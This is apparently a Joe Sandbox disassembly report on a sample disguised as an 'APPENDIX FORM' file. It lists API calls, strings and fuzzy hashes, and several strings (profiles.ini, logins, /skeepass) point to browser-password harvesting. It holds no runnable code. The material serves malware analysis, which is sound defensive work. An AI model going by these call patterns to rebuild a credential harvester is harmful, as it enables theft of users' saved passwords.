                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                              • wcscpy.MSVCRT ref: 004041D6
                                                                                                              • wcscpy.MSVCRT ref: 004041E7
                                                                                                              • memset.MSVCRT ref: 00404200
                                                                                                              • memset.MSVCRT ref: 00404215
                                                                                                              • _snwprintf.MSVCRT ref: 0040422F
                                                                                                              • wcscpy.MSVCRT ref: 00404242
                                                                                                              • memset.MSVCRT ref: 0040426E
                                                                                                              • memset.MSVCRT ref: 004042CD
                                                                                                              • memset.MSVCRT ref: 004042E2
                                                                                                              • _snwprintf.MSVCRT ref: 004042FE
                                                                                                              • wcscpy.MSVCRT ref: 00404311
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                              • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                              • API String ID: 2454223109-1580313836
                                                                                                              • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                              • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                              • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                              • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                              • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                              • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                              • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                              • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                              • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                              • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                              • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                              • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                              • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll$p+vw@Fvw@Bvw
                                                                                                              • API String ID: 667068680-772928780
                                                                                                              • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                              • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                              • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                              • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                              • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                              • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                              • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                              • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                              • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                              • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                              • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                              • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                              • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                              • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                              • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                              • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                              • API String ID: 4054529287-3175352466
                                                                                                              • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                              • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                              • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                              • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                              • API String ID: 3143752011-1996832678
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                              • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                              • API String ID: 1607361635-601624466
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _snwprintf$memset$wcscpy
                                                                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                              • API String ID: 2000436516-3842416460
                                                                                                              APIs
                                                                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                              • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                              • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                              • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                              • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                              • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                              • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                              • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                              • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                              • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                              • String ID:
                                                                                                              • API String ID: 1043902810-0
                                                                                                              APIs
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                              • _snwprintf.MSVCRT ref: 0044488A
                                                                                                              • wcscpy.MSVCRT ref: 004448B4
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                              • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                              • API String ID: 2899246560-1542517562
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040DBCD
                                                                                                              • memset.MSVCRT ref: 0040DBE9
                                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                              • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                              • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                              • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                              • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                                                                              • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                                                                              • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                              • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                              • API String ID: 3330709923-517860148
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                              • memset.MSVCRT ref: 0040806A
                                                                                                              • memset.MSVCRT ref: 0040807F
                                                                                                              • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                              • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                              • memset.MSVCRT ref: 004081E4
                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                              • String ID: logins$null
                                                                                                              • API String ID: 2148543256-2163367763
                                                                                                              APIs
                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                              • memset.MSVCRT ref: 004085CF
                                                                                                              • memset.MSVCRT ref: 004085F1
                                                                                                              • memset.MSVCRT ref: 00408606
                                                                                                              • strcmp.MSVCRT ref: 00408645
                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                              • memset.MSVCRT ref: 0040870E
                                                                                                              • strcmp.MSVCRT ref: 0040876B
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                              • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                              • String ID: ---
                                                                                                              • API String ID: 3437578500-2854292027
                                                                                                              • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                              • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                              • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                              • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0041087D
                                                                                                              • memset.MSVCRT ref: 00410892
                                                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                              • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                              • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                              • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                              • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                              • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                              • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                              • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                              • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                              • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                              • String ID:
                                                                                                              • API String ID: 1010922700-0
                                                                                                              • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                              • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                              • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                              • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                              APIs
                                                                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                              • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                              • malloc.MSVCRT ref: 004186B7
                                                                                                              • free.MSVCRT ref: 004186C7
                                                                                                              • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                              • free.MSVCRT ref: 004186E0
                                                                                                              • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                              • malloc.MSVCRT ref: 004186FE
                                                                                                              • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                              • free.MSVCRT ref: 00418716
                                                                                                              • free.MSVCRT ref: 0041872A
                                                                                                              • free.MSVCRT ref: 00418749
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: free$FullNamePath$malloc$Version
                                                                                                              • String ID: |A
                                                                                                              • API String ID: 3356672799-1717621600
                                                                                                              • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                              • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                              • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                              • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcsicmp
                                                                                                              • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                              • API String ID: 2081463915-1959339147
                                                                                                              • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                              • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
